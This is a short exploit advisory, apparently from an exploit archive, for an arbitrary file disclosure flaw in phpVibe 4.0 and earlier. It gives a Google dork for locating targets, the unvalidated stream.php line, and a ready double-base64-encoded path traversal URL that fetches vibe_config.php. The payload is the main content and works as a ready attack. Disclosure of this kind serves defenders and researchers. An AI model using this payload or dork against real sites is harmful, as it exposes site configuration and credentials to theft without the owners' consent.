phpVibe 4.0 Arbitrary File Disclosure

2015.07.15
Credit: ali ahmady
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

## In The Name Of ALLAH ## # Exploit Title: phpVibe ALL versions (version 4.0 and older versions) Aribtrary File Disclosure # Google Dork: "powered by phpvibe" # Date: 2015/07/13 (july 13th) # Exploit Author: ali ahmady -- Iranian Security Researcher (snip3r_ir[at]hotmail.com) # Vendor Homepage: http://www.phpvibe.com/ # Software Link: http://get.phpvibe.com/ # Version: All versions (leading to version 4.0) # Tested on: linux # greetings : VIRkid, b0x, phantom_x, Ch3rn0by1 stream.php ==================================== $token = htmlspecialchars(base64_decode(base64_decode($_GET["file"]))); file parameter has no validation and sanitization! exploition can be performed by adding "@@media" to the file name and base64 it two times as below (no registration needed): http://domain.tld/stream.php?file=../vibe_config.php@@media ==> http://domain.tld/stream.php?file=TGk0dmRtbGlaVjlqYjI1bWFXY3VjR2h3UUVCdFpXUnBZUT09 =====================================


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top